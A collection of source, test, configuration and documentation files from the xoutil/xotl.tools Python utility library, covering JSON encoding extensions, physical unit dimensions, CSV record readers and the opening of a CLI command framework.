"alphanum_fraction": 0.6390658020973206, "avg_line_length": 28.4375, "blob_id": "afd4b00ee485fd1b8971b0a2d837f0473d8872d3", "content_id": "4920c63c9610dc94382b4d2b76cdb68e4eff2a9f", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 471, "license_type": "permissive", "max_line_length": 77, "num_lines": 16, "path": "/docs/source/xotl.tools/future/json.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "`xotl.tools.future.json`:mod: - Encode and decode the JSON format\n=================================================================\n\n.. module:: xotl.tools.future.json\n\nThis module extends the standard library's `json`:mod:. You may use it\nas a drop-in replacement in many cases.\n\nAvoid importing ``*`` from this module since could be different in Python 2.7\nand Python 3.3.\n\nWe added the following features.\n\n.. autoclass:: JSONEncoder\n\n.. autofunction:: encode_string\n" }, { "alpha_fraction": 0.7435897588729858, "alphanum_fraction": 0.7435897588729858, "avg_line_length": 77, "blob_id": "f34cfb98dea28caac777692a4a63808c2b2f665a", "content_id": "758d41cd2fead918fc55b00b8b9869dece957296", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 78, "license_type": "permissive", "max_line_length": 77, "num_lines": 1, "path": "/docs/source/history/_changes-1.7.8.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Added module `xoutil.dim`:mod: -- Facilities to work with concrete numbers.\n" }, { "alpha_fraction": 0.7182741165161133, "alphanum_fraction": 0.7271573543548584, "avg_line_length": 33.260868072509766, "blob_id": "f3381056265f638f3c168bbd13cad3dd4665aa73", "content_id": "1961b116df3199c244b43baeecbcf16dac1a83dd", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 788, "license_type": "permissive", "max_line_length": 79, "num_lines": 23, "path": "/docs/source/history/changes-1.2.1.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Loads of improvements for Python 3k compatibility: Several modules were\n fixed or adapted to work on both Python 2.7 and Python 3.2. They include (but\n we might have forgotten some):\n\n - `xoutil.context`:mod:.\n - `!xoutil.aop.basic`:mod:.\n - `xoutil.deprecation`:mod:.\n - `!xoutil.proxy`:mod:.\n\n- Rescued `xoutil.annotate`:mod: and is going to be supported from\n now on.\n\n- Introduced module `xoutil.subprocess`:mod: and function\n `xoutil.subprocess.call_and_check_output`:func:.\n\n- Introduced module `xoutil.decorator.compat`:mod: that enables constructions\n that are interoperable in Python 2 and Python 3.\n\n- Introduced `xoutil.iterators.zip`:func:, `xoutil.iterators.izip`:func:,\n `xoutil.iterators.map`:func:, and `xoutil.iterators.imap`:func:.\n\n\n.. LocalWords: xoutil\n" }, { "alpha_fraction": 0.6474700570106506, "alphanum_fraction": 0.6484687328338623, "avg_line_length": 27.60952377319336, "blob_id": "1c78fb140b7e1119d2cc8915e9917f43ea283bf9", "content_id": "431ea90548d265216acb8174e375cb17b8f722f9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3005, "license_type": "no_license", "max_line_length": 77, "num_lines": 105, "path": "/xotl/tools/future/json.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\"\"\"Extensions to the `json` standard library module.\n\nIt just adds the ability to encode/decode datetimes. But you should use the\nJSONEncoder yourself.\n\nYou may use this module as drop-in replacement to Python's `json`. Also it\ncontains definitions to use C library JSON speedups or Python replacements in\ncase that library is not installed in your system.\n\n\"\"\"\n\n# TODO: consider use IoC to extend python json module\n\nfrom json import * # noqa\nimport json as _stdlib # noqa\n\nfrom json import __all__ # noqa\n\n__all__ = list(__all__) + [\"file_load\", \"encode_string\"]\n\nfrom json import encoder, decoder # noqa\n\n\nclass JSONEncoder(_stdlib.JSONEncoder):\n __doc__ = (\n _stdlib.JSONEncoder.__doc__\n + \"\"\"\n xotl.tools extends this class by supporting the following data-types (see\n `default`:meth: method):\n\n - `datetime`, `date` and `time` values, which are translated to strings\n using ISO format.\n\n - `Decimal` values, which are represented as a string representation.\n\n - Iterables, which are represented as lists.\n\n \"\"\"\n )\n DATE_FORMAT = str(\"%Y-%m-%d\")\n TIME_FORMAT = str(\"%H:%M:%S\")\n DT_FORMAT = str(\"%s %s\") % (DATE_FORMAT, TIME_FORMAT)\n\n def default(self, obj):\n from datetime import datetime, date, time\n from decimal import Decimal\n from collections import Iterable\n\n if isinstance(obj, datetime):\n return obj.strftime(self.DT_FORMAT)\n elif isinstance(obj, date):\n return obj.strftime(self.DATE_FORMAT)\n elif isinstance(obj, time):\n return obj.strftime(self.TIME_FORMAT)\n elif isinstance(obj, Decimal):\n return str(obj)\n elif isinstance(obj, Iterable):\n return list(iter(obj))\n return super().default(obj)\n\n\ntry:\n # New in version 3.5 of standard module.\n JSONDecodeError # noqa\nexcept NameError:\n # Previous implementations raise 'ValueError'\n JSONDecodeError = ValueError\n\n\ndef file_load(filename):\n with file(filename, \"r\") as f:\n return load(f) # noqa\n\n\n# --- encode strings ---\n\nfrom json.encoder import encode_basestring # noqa\n\ntry:\n from _json import encode_basestring_ascii\nexcept ImportError:\n from json.encoder import (\n py_encode_basestring_ascii as encode_basestring_ascii, # noqa\n )\n\n\ndef encode_string(string, ensure_ascii=True):\n \"\"\"Return a JSON representation of a Python string.\n\n :param ensure_ascii: If True, the output is guaranteed to be of type\n `str` with all incoming non-ASCII characters escaped. If False, the\n output can contain non-ASCII characters.\n\n \"\"\"\n encode = encode_basestring_ascii if ensure_ascii else encode_basestring\n return encode(string)\n" }, { "alpha_fraction": 0.7010309100151062, "alphanum_fraction": 0.7422680258750916, "avg_line_length": 47.5, "blob_id": "76566717724126e2bb409de11e65864c60618027", "content_id": "25c64daab70f809c3871bfd2c57c551153bf5e22", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 97, "license_type": "permissive", "max_line_length": 77, "num_lines": 2, "path": "/docs/source/history/changes-1.2.2.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Adds `xoutil.bases`:mod: - Implementations of base 32 and base 64 (numeric)\n representations.\n" }, { "alpha_fraction": 0.6485998034477234, "alphanum_fraction": 0.6504064798355103, "avg_line_length": 24.744186401367188, "blob_id": "8fe0c907af8235ddb041589353aa7f0976bc2baf", "content_id": "4dfa4bb7bfd61ca6433824a893843c0b5b66fc77", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1108, "license_type": "no_license", "max_line_length": 72, "num_lines": 43, "path": "/tests/test_codecs.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ----------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\nfrom hypothesis import given\nfrom hypothesis.strategies import text, binary\n\n\n@given(s=binary())\ndef test_safe_decode_dont_fail_uppon_invalid_encoding(s):\n from xoutil.future.codecs import safe_decode\n\n assert safe_decode(s, \"i-dont-exist\") == safe_decode(s)\n\n\n@given(s=text())\ndef test_safe_encode_dont_fail_uppon_invalid_encoding(s):\n from xoutil.future.codecs import safe_encode\n\n assert safe_encode(s, \"i-dont-exist\") == safe_encode(s)\n\n\n@given(text())\ndef test_safe_encode_yields_bytes(s):\n from xoutil.future.codecs import safe_encode\n\n assert isinstance(safe_encode(s), bytes)\n\n\n@given(binary())\ndef test_safe_decode_yields_unicode(s):\n try:\n Text = unicode\n except NameError:\n Text = str # Python 3\n from xoutil.future.codecs import safe_decode\n\n assert isinstance(safe_decode(s), Text)\n" }, { "alpha_fraction": 0.6040372848510742, "alphanum_fraction": 0.6238353848457336, "avg_line_length": 17.140844345092773, "blob_id": "67195cf2f58e74fafa4518b82dcf9a27c2c58bb6", "content_id": "de57401de7739840ab80403612fdccd2e4edcd9f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2580, "license_type": "no_license", "max_line_length": 80, "num_lines": 142, "path": "/xotl/tools/dim/base.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\"\"\"The standard `physical quantities`_.\n\n.. _physical quantities: \\\nhttps://en.wikipedia.org/wiki/International_System_of_Quantities#Base_quantities\n\n\"\"\"\n\nfrom .meta import Dimension, UNIT\n\n\ndef kilo(v):\n return 1000 * v\n\n\ndef centi(v):\n return v / 100\n\n\ndef milli(v):\n return v / 1000\n\n\ndef micro(v):\n return v / 1000000\n\n\ndef nano(v):\n return v / (10 ** 9)\n\n\[email protected]()\nclass Length:\n metre = UNIT\n kilometer = km = kilo(metre)\n centimeter = cm = centi(metre)\n millimeter = mm = milli(metre)\n nanometer = nm = nano(metre)\n\n\nmetre = m = Length.m = Length.metre\nL = Length\n\n\[email protected]\nclass Time:\n second = UNIT\n millisecond = ms = milli(second)\n nanosecond = ns = nano(second)\n minute = second * 60\n hour = minute * 60\n\n\nsecond = s = Time.s = Time.second\nT = Time\n\n\[email protected](unit_aliases=(\"kg\",))\nclass Mass:\n kilogram = UNIT\n gram = kilogram / 1000\n\n\nkilogram = kg = Mass.kg\nM = Mass\n\n\[email protected](unit_aliases=\"A\")\nclass ElectricCurrent:\n ampere = UNIT\n milliampere = milli(ampere)\n\n\nA = ampere = ElectricCurrent.A\nI = ElectricCurrent\n\n\[email protected](unit_aliases=\"K\")\nclass Temperature:\n kelvin = UNIT\n\n @classmethod\n def from_celcius(cls, val):\n \"Convert `val` ºC to K\"\n return (val + 273.15) * cls.kelvin\n\n @classmethod\n def from_fahrenheit(cls, val):\n \"Convert `val` ºF to K\"\n return (val + 459.67) * (5 / 9) * cls.kelvin\n\n\nK = kelvin = Temperature.K\nO = Temperature # The actual symbol would be the capital letter Theta: Θ\n\n\[email protected](unit_alias=\"mol\")\nclass Substance:\n mole = UNIT\n\n\nmole = mol = Substance.mol\nN = Substance\n\n\[email protected]\nclass Luminosity:\n candela = UNIT\n\n\nJ = Luminosity\n\n\n# Derived quantities\nArea = L ** 2\nVolume = L ** 3\nVolume.metre_cubic = Volume._unit_\nVolume._unitname_ = \"metre_cubic\"\n\nFrequency = T ** -1\nFrequency.Hz = Frequency._unit_\n\nForce = L * M / T ** 2\nassert hasattr(Force, \"metre_kilogram_per_second_squared\")\nassert Force == L * M * T ** -2\nForce.Newton = Force.N = Force._unit_\n\nPresure = M / L / T ** 2\nassert hasattr(Presure, \"kilogram_per_metre_per_second_squared\")\nassert Presure == L ** -1 * M * T ** -2, \"as defined in Wikipedia\"\nPresure.Pascal = Presure.Pa = Presure._unit_\n\nVelocity = L / T\nAcceleration = L / T ** 2\n" }, { "alpha_fraction": 0.5762237906455994, "alphanum_fraction": 0.5832167863845825, "avg_line_length": 19.428571701049805, "blob_id": "e29b352c28fd18755fd51b2c014ca1389b4cf0aa", "content_id": "968a9f599b48162b553298ef6b7e011a2772dfab", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 716, "license_type": "no_license", "max_line_length": 76, "num_lines": 35, "path": "/xotl/tools/release.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\ntry:\n from ._version import get_version\n\n VERSION = get_version()\n\nexcept ImportError:\n from ._version import get_versions\n\n VERSION = get_versions()[\"version\"]\n\n\nRELEASE_TAG = \"\"\n\n\ndef safe_int(x):\n try:\n return int(x)\n except ValueError:\n return x\n\n\n# I won't put the release tag in the version_info tuple. Since PEP440 is on\n# the way.\nVERSION_INFO = tuple(safe_int(x) for x in VERSION.split(\".\"))\n\n\ndel safe_int\n" }, { "alpha_fraction": 0.6202531456947327, "alphanum_fraction": 0.6962025165557861, "avg_line_length": 78, "blob_id": "c564ebb33b3832f108275252d457d57c8c9d65f5", "content_id": "ac7a591d5f889083fc96b833b738d30da6f744ef", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 79, "license_type": "permissive", "max_line_length": 78, "num_lines": 1, "path": "/docs/source/history/_changes-2.0.9.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Incorporates all (applicable) changes from `release 1.9.9 <rel-1.9.9>`:ref:\\\n" }, { "alpha_fraction": 0.4969879388809204, "alphanum_fraction": 0.5933734774589539, "avg_line_length": 17.97142791748047, "blob_id": "43309a8dc4762e6946b0a792fba6b4d2fb1d4a09", "content_id": "567c37f900d9b1fe0be71d6ed298aa04214b64b2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "INI", "length_bytes": 664, "license_type": "no_license", "max_line_length": 59, "num_lines": 35, "path": "/tox.ini", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "[tox]\nenvlist =\n {3.4,3.5,3.6,3.7,pypy}-unit\n {3.4,3.5,3.6,3.7,pypy}-greenlets\n 3.6-staticcheck\n\n[testenv]\nbasepython =\n 3.4: python3.4\n 3.5: python3.5\n 3.6: python3.6\n 3.7: python3.7\n system: python3\n pypy: pypy3\n\ndeps = python-dateutil==2.6.1\n mock<1.3\n pytest~=5.2\n hypothesis>=4.26.4,<5\n pytz==2017.2\n pytest-xdist==1.26.1\n pytest-cov==2.6.1\n\n greenlets: greenlet\n\n staticcheck: mypy==0.630\n\n\nsitepackages = False\nrecreate = False\n\ncommands=\n unit: py.test -l -q --cov=xotl.tools []\n greenlets: py.test -l -q -k greenlet []\n staticcheck: mypy -p xotl.tools --ignore-missing-imports\n" }, { "alpha_fraction": 0.4262734651565552, "alphanum_fraction": 0.4262734651565552, "avg_line_length": 19.72222137451172, "blob_id": "af33f6398684f03cbbaf23c8a9e7b2f38c88f233", "content_id": "944c836a20dedd418831e9e0c197938673982326", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 373, "license_type": "permissive", "max_line_length": 62, "num_lines": 18, "path": "/docs/source/xotl.tools/cli.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "==============================================================\n `xotl.tools.cli`:mod: -- Command line application facilities\n==============================================================\n\n.. automodule:: xotl.tools.cli\n :members:\n\nApplications\n============\n\n.. automodule:: xotl.tools.cli.app\n :members:\n\nTools\n=====\n\n.. automodule:: xotl.tools.cli.tools\n :members:\n" }, { "alpha_fraction": 0.6078903079032898, "alphanum_fraction": 0.6175082325935364, "avg_line_length": 29.76438331604004, "blob_id": "72d55ea2153b828499e631b1f41ffc87ae734bdb", "content_id": "a63f252b5ddfaf5da353c849d7105afcf53b2076", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 11230, "license_type": "no_license", "max_line_length": 87, "num_lines": 365, "path": "/xotl/tools/records.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\"\"\"Records definitions.\n\nA record allows to describe plain external data and a simplified model to\n*read* it. The main use of records is to represent data that is read from a\n`CSV file <305>`:pep:.\n\nSee the `record`:class: class to find out how to use it.\n\n\"\"\"\n\n\nfrom xotl.tools.symbols import Unset\nfrom xotl.tools.future.functools import lru_cache\n\n\n@lru_cache()\ndef field_descriptor(field_name):\n \"\"\"Returns a read-only descriptor for `field_name`.\"\"\"\n\n class descriptor:\n def __get__(self, instance, owner):\n if instance:\n return owner.get_field(\n instance._raw_data, owner._rec_fields[field_name]\n )\n else:\n return self\n\n return descriptor\n\n\nclass _record_type(type):\n @staticmethod\n def _is_rec_definition(attr, val=Unset):\n result = not attr.startswith(\"_\") and attr.upper() == attr\n if val is not Unset:\n from numbers import Integral\n\n result = result and isinstance(val, (Integral, str))\n return result\n\n @staticmethod\n def is_reader(attr, func, fields=None):\n from xotl.tools.future.types import FunctionType\n\n attr = attr.lower()\n good_name = attr.startswith(\"_\") and attr.endswith(\"_reader\")\n good_type = isinstance(func, (FunctionType, staticmethod))\n return good_name and good_type\n\n def __new__(cls, name, bases, attrs):\n def static(f):\n return f if isinstance(f, staticmethod) else staticmethod(f)\n\n cls_fields = {\n attr: val\n for attr, val in attrs.items()\n if cls._is_rec_definition(attr, val)\n }\n descriptors = {attr.lower(): field_descriptor(attr)() for attr in cls_fields}\n readers = {\n attr.lower(): static(func)\n for attr, func in attrs.items()\n if cls.is_reader(attr, func)\n }\n new_attrs = dict(attrs, **descriptors)\n new_attrs.update(readers)\n result = super().__new__(cls, name, bases, new_attrs)\n # Make a copy, or else the super-class attribute gets contaminated\n fields = dict(getattr(result, \"_rec_fields\", {}))\n index = dict(getattr(result, \"_rec_index\", {}))\n fields.update(cls_fields)\n if len(fields) != len({val for val in fields.values()}):\n msg = 'Duplicated field index definition in class \"%s\"' % name\n import logging\n\n logger = logging.getLogger(__name__)\n logger.error(msg)\n logger.debug(fields)\n raise TypeError(msg)\n result._rec_fields = fields\n index.update({val: attr for attr, val in cls_fields.items()})\n result._rec_index = index\n return result\n\n def get_field(self, raw_data, field):\n from xotl.tools.symbols import Undefined\n\n field_name = self._rec_index[field]\n try:\n value = raw_data[field]\n except (IndexError, KeyError):\n value = Undefined\n reader_name = \"_%s_reader\" % field_name.lower()\n reader = getattr(self, reader_name, None)\n if reader:\n return reader(value)\n else:\n return value\n\n\nclass record(metaclass=_record_type):\n \"\"\"Base record class.\n\n Records allow to represent a sequence or mapping of values extracted from\n external sources into a dict-like Python value.\n\n The first use-case for this abstraction is importing data from a `CSV file\n <305>`:pep:. You could represent each line as an instance of a properly\n defined record.\n\n An instance of a record would represent a single `line` (or row) from the\n external data source.\n\n Records are expected to declare `fields`. Each field must be a\n CAPITALIZED valid identifier like::\n\n >>> class INVOICE(record):\n ... ID = 0\n ... REFERENCE = 1\n\n Fields must be integers or plain strings. Fields must not begin with an\n underscore (\"_\"). External data lines are required to support indexes of\n those types.\n\n You could use either the classmethod `get_field`:func: to get the value of\n field in a single line (data as provided by the external source)::\n\n >>> line = (1, 'AA20X138874Z012')\n >>> INVOICE.get_field(line, INVOICE.REFERENCE)\n 'AA20X138874Z012'\n\n You may also have an instance::\n\n >>> invoice = INVOICE(line)\n >>> invoice.reference\n 'AA20X138874Z012'\n\n .. note:: Instances attributes are renamed to lowercase. So you **must**\n not create any other attribute that has the same name as a field in\n lowercase, or else it will be overwritten.\n\n You could define `readers` for any field. For instance if you have a\n \"CREATED_DATETIME\" field you may create a \"_created_datetime_reader\"\n function that will be used to parse the raw value of the instance into an\n expected type. See the `included readers builders below\n <included-readers>`:ref:.\n\n Readers are always cast as `staticmethods`, whether or not you have\n explicitly stated that fact::\n\n >>> from dateutil import parser\n >>> class BETTER_INVOICE(INVOICE):\n ... CREATED_TIME = 2\n ... _created_time_reader = lambda val: parser.parse(val)\n\n >>> line = (1, 'AA20X138874Z012', '2014-02-17T17:29:21.965053')\n >>> BETTER_INVOICE.get_field(line, BETTER_INVOICE.CREATED_TIME)\n datetime.datetime(2014, 2, 17, 17, 29, 21, 965053)\n\n .. warning:: Creating readers for fields defined in super classes is not\n directly supported. To do so, you **must** declare the reader as a\n staticmethod yourself.\n\n .. note:: Currently there's no concept of relationship between rows in\n this model. We are evaluating whether by placing a some sort of\n context into the `kwargs` argument would be possible to write readers\n that fetch other instances.\n\n \"\"\"\n\n def __init__(self, raw_data):\n self._raw_data = raw_data\n\n def __repr__(self):\n cls = type(self)\n return \"%s(%r)\" % (cls.__name__, self._raw_data)\n\n def __getitem__(self, field_index):\n return type(self).get_field(self._raw_data, field_index)\n\n\ndef isnull(val):\n \"\"\"Return True if `val` is null.\n\n Null values are None, the empty string and any False instance of\n `xotl.tools.symbols.boolean`:class:.\n\n Notice that 0, the empty list and other false values in Python are not\n considered null. This allows that the CSV null (the empty string) is\n correctly treated while other sources that provide numbers (and 0 is a\n valid number) are not misinterpreted as null.\n\n \"\"\"\n from xotl.tools.symbols import boolean\n\n return val in (None, \"\") or (isinstance(val, boolean) and not val)\n\n\n# Standard readers\ndef check_nullable(val, nullable):\n \"\"\"Check the restriction of nullable.\n\n Return True if the val is non-null. If nullable is True and the val is\n null returns False. If `nullable` is False and `val` is null, raise a\n ValueError.\n\n Test for null is done with function `isnull`:func:.\n\n \"\"\"\n null = isnull(val)\n if not null or nullable:\n return not null\n else:\n raise ValueError(\"NULL value was not expected here\")\n\n\n@lru_cache()\ndef datetime_reader(format, nullable=False, default=None, strict=True):\n \"\"\"Returns a datetime reader.\n\n :param format: The format the datetime is expected to be in the external\n data. This is passed to `datetime.datetime.strptime`:func:.\n\n :param strict: Whether to be strict about datetime format.\n\n The reader works first by passing the value to strict\n `datetime.datetime.strptime`:func: function. If that fails with a\n ValueError and strict is True the reader fails entirely.\n\n If strict is False, the worker applies different rules. First if the\n `dateutil` package is installed its parser module is tried. If `dateutil`\n is not available and nullable is True, return None; if nullable is False\n and default is not null (as in `isnull`:func:), return `default`,\n otherwise raise a ValueError.\n\n .. versionadded: 1.6.7 Add the `strict` argument.\n\n .. versionchanged: 1.6.7.1 Keep the meaning of null when testing for\n `default` if strict is False and dateutil is not available.\n\n \"\"\"\n try:\n from dateutil.parser import parse\n except ImportError:\n parse = None\n\n def reader(val):\n if check_nullable(val, nullable):\n from datetime import datetime\n\n try:\n return datetime.strptime(val, format)\n except ValueError:\n if strict:\n raise\n elif parse:\n return parse(val)\n else:\n if nullable:\n return None\n elif not isnull(default):\n return default\n else:\n raise ValueError\n else:\n return default\n\n return reader\n\n\n@lru_cache()\ndef date_reader(format, nullable=False, default=None, strict=True):\n \"\"\"Return a date reader.\n\n This is similar to `datetime_reader`:func: but instead of returning a\n `datetime.datetime`:class: it returns a `datetime.date`.\n\n Actually this function delegates to `datetime_reader`:func: most of its\n functionality.\n\n .. versionadded: 1.6.8\n\n \"\"\"\n reader = datetime_reader(format, nullable=nullable, default=default, strict=strict)\n\n def res(val):\n result = reader(val)\n if not isnull(result) and result is not default:\n return result.date()\n else:\n return result\n\n return res\n\n\n@lru_cache()\ndef boolean_reader(true=(\"1\",), nullable=False, default=None):\n \"\"\"Returns a boolean reader.\n\n :param true: A collection of raw values considered to be True. Only the\n values in this collection will be considered True values.\n\n \"\"\"\n\n def reader(val):\n if check_nullable(val, nullable):\n return val in true\n else:\n return default\n\n return reader\n\n\n@lru_cache()\ndef integer_reader(nullable=False, default=None):\n \"\"\"Returns an integer reader.\"\"\"\n\n def reader(val):\n if check_nullable(val, nullable):\n return int(val)\n else:\n return default\n\n return reader\n\n\n@lru_cache()\ndef decimal_reader(nullable=False, default=None):\n \"\"\"Returns a Decimal reader.\"\"\"\n\n def reader(val):\n if check_nullable(val, nullable):\n from decimal import Decimal\n\n return Decimal(val)\n else:\n return default\n\n return reader\n\n\n@lru_cache()\ndef float_reader(nullable=False, default=None):\n \"\"\"Returns a float reader.\"\"\"\n\n def reader(val):\n if check_nullable(val, nullable):\n return float(val)\n else:\n return default\n\n return reader\n\n\ndel lru_cache\n" }, { "alpha_fraction": 0.7357142567634583, "alphanum_fraction": 0.7357142567634583, "avg_line_length": 30.11111068725586, "blob_id": "78351f2cf190ddeab840955c8ad71076c1f742ff", "content_id": "53bab0f462c2d1851e04d10106f873894f9318fa", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 280, "license_type": "permissive", "max_line_length": 68, "num_lines": 9, "path": "/docs/source/history/_changes-1.6.8.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Added `xoutil.records.date_reader`:func:.\n\n- Added a forward-compatible ``xoutil.inspect.getfullargspec``.\n\n- Now `contexts <xoutil.context>`:mod: will support gevent-locals if\n available. See the note in `the module documentation\n <context-greenlets>`:ref:.\n\n- Minor fixes.\n" }, { "alpha_fraction": 0.6202531456947327, "alphanum_fraction": 0.6962025165557861, "avg_line_length": 78, "blob_id": "1e61ed10d2d9f3ffeb6c3d3b8da3f69ca8278dde", "content_id": "00dd9187522227ca471aa7f139783258a0fbee03", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 79, "license_type": "permissive", "max_line_length": 78, "num_lines": 1, "path": "/docs/source/history/_changes-2.0.1.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Incorporates all (applicable) changes from `release 1.9.1 <rel-1.9.1>`:ref:.\n" }, { "alpha_fraction": 0.4751381278038025, "alphanum_fraction": 0.4751381278038025, "avg_line_length": 35.20000076293945, "blob_id": "e87d89ee4426d704157dd4ff0b40fda27c124919", "content_id": "6933f66336b883e7ceaed3a86cfcb715335f435c", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 181, "license_type": "permissive", "max_line_length": 62, "num_lines": 5, "path": "/docs/source/xotl.tools/values/simple.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "`xotl.tools.values.simple`:mod: -- Simple or internal coercers\n==============================================================\n\n.. automodule:: xotl.tools.values.simple\n :members:\n" }, { "alpha_fraction": 0.5487886667251587, "alphanum_fraction": 0.5513683557510376, "avg_line_length": 30.505300521850586, "blob_id": "3b42f86aeda66d9a4f44569727d77acafbc0e786", "content_id": "5cc58f7ae460e6072be3f4b16321b6092c581bc0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8917, "license_type": "no_license", "max_line_length": 78, "num_lines": 283, "path": "/xotl/tools/cli/__init__.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\"\"\"Tools for Command-Line Interface (CLI) applications.\n\nCLI is a mean of interaction with a computer program where the user (or\nclient) issues commands to the program in the form of successive lines of text\n(command lines).\n\nCommands can be registered by:\n\n - sub-classing the `Command`:class:,\n - using `~abc.ABCMeta.register`:meth: ABC mechanism for virtual sub-classes,\n - redefining `~`Command.sub_commands`` class method.\n\n.. versionadded:: 1.4.1\n\n\"\"\"\n\nfrom abc import abstractmethod, ABCMeta, ABC\nfrom xotl.tools.objects import staticproperty\nfrom xotl.tools.cli.tools import command_name, program_name\n\n\nclass CommandMeta(ABCMeta):\n \"\"\"Meta-class for all commands.\"\"\"\n\n def __new__(meta, name, bases, namespace):\n cls = super(CommandMeta, meta).__new__(meta, name, bases, namespace)\n cls.__subcommands_registry__ = set()\n return cls\n\n def register(cls, subclass):\n \"\"\"Register a virtual subclass of a Command.\n\n Returns the sub-command, to allow usage as a class decorator.\n\n .. note:: Python 3.7 hides internal registry (``_abc_registry``), so\n a sub-commands registry is implemented.\n\n \"\"\"\n cls.__subcommands_registry__.add(subclass)\n res = super(CommandMeta, cls).register(subclass)\n if res is None:\n res = subclass\n return res\n\n def cli_name(cls):\n \"\"\"Calculate the command name.\n\n Standard method uses `~xotl.tools.cli.tools.hyphen_name`. Redefine it\n to obtain a different behaviour.\n\n Example::\n\n >>> class MyCommand(Command):\n ... pass\n\n >>> MyCommand.cli_name() == 'my-command'\n True\n\n \"\"\"\n from xotl.tools.cli.tools import hyphen_name\n\n unset = object()\n names = (\"command_cli_name\", \"__command_name__\")\n i, res = 0, unset\n while i < len(names) and res is unset:\n name = names[i]\n res = getattr(cls, names[i], unset)\n if res is unset:\n i += 1\n elif not isinstance(res, str):\n msg = \"Attribute '{}' must be a string.\".format(name)\n raise TypeError(msg)\n if res is unset:\n res = hyphen_name(cls.__name__)\n return res\n\n def get_setting(cls, name, *default):\n aux = len(default)\n if aux < 2:\n unset = object()\n default = default[0] if aux == 1 else unset\n res = cls.__settings__.get(name, default)\n if res is not unset:\n return res\n else:\n raise KeyError(name)\n else:\n msg = \"get_setting() takes at most 3 arguments ({} given)\"\n raise TypeError(msg.format(aux + 2))\n\n def set_setting(cls, name, value):\n cls.__settings__[name] = value # TODO: Check type\n\n def set_default_command(cls, cmd=None):\n \"\"\"Default command is called when no one is specified.\n\n A command is detected when its name appears as the first command-line\n argument.\n\n To specify a default command, use this method with the command as a\n string (the command name) or the command class.\n\n If the command is specified, then the calling class is the selected\n one.\n\n For example::\n\n >>> Command.set_default_command('server') # doctest: +SKIP\n >>> Server.set_default_command() # doctest: +SKIP\n >>> Command.set_default_command(Server) # doctest: +SKIP\n\n 